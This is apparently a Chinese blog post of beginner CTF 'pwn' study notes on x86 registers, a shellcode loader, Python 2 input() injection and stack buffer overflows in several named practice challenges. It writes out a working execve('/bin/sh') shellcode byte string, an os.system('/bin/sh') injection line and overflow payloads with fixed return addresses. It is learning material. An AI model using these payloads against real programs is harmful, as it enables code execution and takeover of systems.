Pwn学习笔记

寄存器

EAX
EBX
ECX
EDX
EDI
ESI
EBP指向系统栈最上面一个栈帧的底部。
ESP保存当前 Stack 的地址

Pwn学习笔记_第1张图片

汇编指令

指令 平台 作用
ucomiss x86 浮点比较
Paragraph Text And more

shallcode

char * input = (char *) malloc(sizeof(char)*256);
read(0, input, 256);
((void (*)())(input))();

把字符串当函数执行,直接跑shallcode脚本,然后手动cat flag

payload = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

python2 input

    while True:
        input(">")

python2的input() 能自动识别出输入的类型,将输入内容转换为对应类型(str、int、float)

输入3+2返回就是5

写脚本 import(‘os’).system(‘/bin/sh’)

然后cat flag

gets返回覆盖

warmup_csaw_2016

脚本如下gets中的录入长度+ebp大小(64位是8)+p64(被调函数地址)

payload = b’a’ * (0x40 + 8) + p64(0x400611)

Pwn学习笔记_第2张图片

gets任意写

ciscn_2019_n_1

Pwn学习笔记_第3张图片

v2开始位置是rbp-4h

v1开始位置是rbp-30h

需要覆盖0x30-0x4=44

Pwn学习笔记_第4张图片

发现func函数的浮点比较命令,跳转dword_4007F4,可以拿到11.28125对应的十六进制41348000h

payload = b"A" * 44 + p64(0x41348000)

printf溢出读

pwn1_sctf_2016

Pwn学习笔记_第5张图片

s大小位3C即60

而fgets限制输入32

发现18行有一个替换操作,猜想"I"被替代为了"You"

nc连接发现确实是这样

那可以构建

payload = b"I" * 20 + b’a’ * 4 + p64(0x8048F0D)

read任意读

StackOverFlow

Pwn学习笔记_第6张图片

没啥说的,注意一下32位程序,ebp是4

payload = b"a" * (72 + 4) + p32(0x8048EE0)

你可能感兴趣的:(pwn,学习)